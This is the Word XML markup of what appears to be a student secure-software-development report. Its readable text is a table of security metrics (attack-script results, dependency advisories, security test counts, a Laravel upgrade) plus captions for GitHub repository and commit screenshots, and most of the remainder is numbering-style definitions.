            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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FF">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Attack scripts succeeding</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0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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12 / 12</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> core suite + V-20 separate reproduction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1">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 / 14</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2">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Composer advisories</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3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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41</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4">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5">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npm advisories</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6">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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23 (2 critical, 14 high)</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7">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8">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Backend security tests</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9">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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A">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90 (230 assertions)</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B">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Frontend security tests</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C">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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D">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19</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E">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Security lint gate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0F">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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0">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clean</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1">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Framework</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2">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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Laravel 10.50 (EOL)</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3">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Laravel 12.69.2</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4">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Token lifetime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5">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:righ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unlimited</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6">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 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="433"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7">
            <w:pPr>
              <w:spacing w:after="0" w:line="259"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Audited security events</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8">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="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219">
            <w:pPr>
              <w:spacing w:after="0" w:line="259"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 event types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commit history: The GitHub evidence below records four contributors, 11 branches and 30 commits in the reporting-period snapshot. The Insights view shows 0 files changed on main in that snapshot; the contributor branches preserve the individual work used for review and integration.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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4778094" cy="2036358"/>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78094" cy="2036358"/>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160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1. GitHub repository overview showing the SSD_Assigment project and its security evidence folders.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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4971482" cy="2580395"/>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971482" cy="2580395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4710436" cy="2190108"/>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10436" cy="2190108"/>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160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figures 2 and 3. GitHub branch list and Insights summary showing the contributor branches, four authors and recorded commit activity.</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899" w:orient="portrait"/>
      <w:pgMar w:bottom="1199" w:top="909" w:left="826" w:right="83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4" w:hanging="354"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1155" w:hanging="1155"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1875" w:hanging="1875"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2595" w:hanging="2595"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3315" w:hanging="3315"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4035" w:hanging="4035"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="4755"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5475" w:hanging="5475"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6195" w:hanging="6195"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="312" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1155" w:hanging="1155"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1875" w:hanging="1875"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2595" w:hanging="2595"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3315" w:hanging="3315"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4035" w:hanging="4035"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="4755"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5475" w:hanging="5475"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6195" w:hanging="6195"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="152235"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="430" w:hanging="430"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1239" w:hanging="1239"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1959" w:hanging="1959"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2679" w:hanging="2679"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3399" w:hanging="3399"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4119" w:hanging="4119"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4839" w:hanging="4839"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5559" w:hanging="5559"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6279" w:hanging="6279"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="eff7ff"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="221" w:hanging="221"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="1080"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:strike w:val="0"/>
        <w:color w:val="0b2d56"/>
        <w:sz w:val="19"/>
        <w:szCs w:val="19"/>
        <w:u w:val="none"/>
        <w:shd w:fill="auto" w:val="clear"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
